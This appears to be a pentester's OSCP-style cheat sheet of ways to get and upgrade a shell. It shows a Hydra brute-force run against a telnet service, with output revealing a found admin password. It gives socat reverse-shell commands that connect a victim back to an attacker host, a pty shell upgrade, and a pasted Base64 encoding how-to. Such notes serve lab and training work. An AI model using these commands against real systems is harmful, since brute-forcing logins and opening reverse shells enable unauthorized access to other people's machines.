Tricks

Some useful tricks that could be useful to get a shell

Hydra

c:\PENTEST\thc-hydra>hydra -L username.txt -P passlist.txt 10.10.10.xx telnet
Hydra v8.7-dev (c) 2018 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-03-03 19:19:13
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 16 tasks per 1 server, overall 16 tasks, 24 login tries (l:6/p:0), ~4 tries per task
[DATA] attacking telnet://10.10.10.xx:23/
[23][telnet] host: 10.10.10.98 login: admin password: secretpw
[STATUS] 24.00 tries/min, 24 tries in 00:00h, 0 to do in 01:00h, 1 active
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-03-03 19:20:18
  • You can setup a simple web server using Python or PHP.
    • Python:
     python -m SimpleHTTPServer 8080

    And a simple HTTP server will be listening on your 8080 TCP port.

    • PHP:
     php -S 127.0.0.1:8080

    And a simple HTTP server will be listening on 127.0.0.1:8080.

upgrading shells

  • Python with “pty”:
python -c "import pty; pty.spawn('/bin/bash')"
  • Socat

On your localhost (attacker):

socat file:`tty`,raw,echo=0 tcp-listen:443

On your victim:

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<LHOST_IP>:443
Base64 encoding is used in quite a few places and there are many online web sites that let you encode or decode Base64. I am not very comfortable using such sites for security and privacy reasons so I went looking for alternative solutions. Whether you’re using LinuxWindows or macOS you can use built-in tools to both encode or decode Base64 data. So ditch any online sites and start using software that is installed locally on your computer. Here’s how.

You will need to do all of this via the command line. Given you’re already dealing with Base64 data I am going to assume you know how to bring that up on your operating system. Scroll down to the relevant section based on your OS below, also substitute your file names as appropriate.

I am going to use .txt for the decoded data file extension and .b64 for the Base64 encoded file extension.

Linux

 Encode a data file to Base64

base64 data.txt > data.b64
 Decode a Base64 file

base64 -d data.b64 > data.txt

Windows

 Encode a data file to Base64

certutil -encode data.txt tmp.b64 && findstr /v /c:- tmp.b64 > data.b64
 Decode a Base64 file

certutil -decode data.b64 data.txt

Note: encoding with the above command will leave a temporary file, tmp.b64, on your file system. If you do not wish to have that file present simply add this to the end of the command: && del tmp.b64

PS C:\Users\jacco> [Convert]::ToBase64String([IO.File]::ReadAllBytes( "C:\PENTEST\secret.txt"))
ZGl0IGJlc3RhbmQgaXMgZ2VoZWltDQpncm9ldGplcyBQdWNr
PS C:\Users\jacco>

Interesting links to read!

https://blog.ropnop.com/transferring-files-from-kali-to-windows/ (A lot of techniques to transfer files from attacker machine to a windows box)
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ (Upgrading simple shells techniques)

https://github.com/RustyShackleford221/OSCP-Prep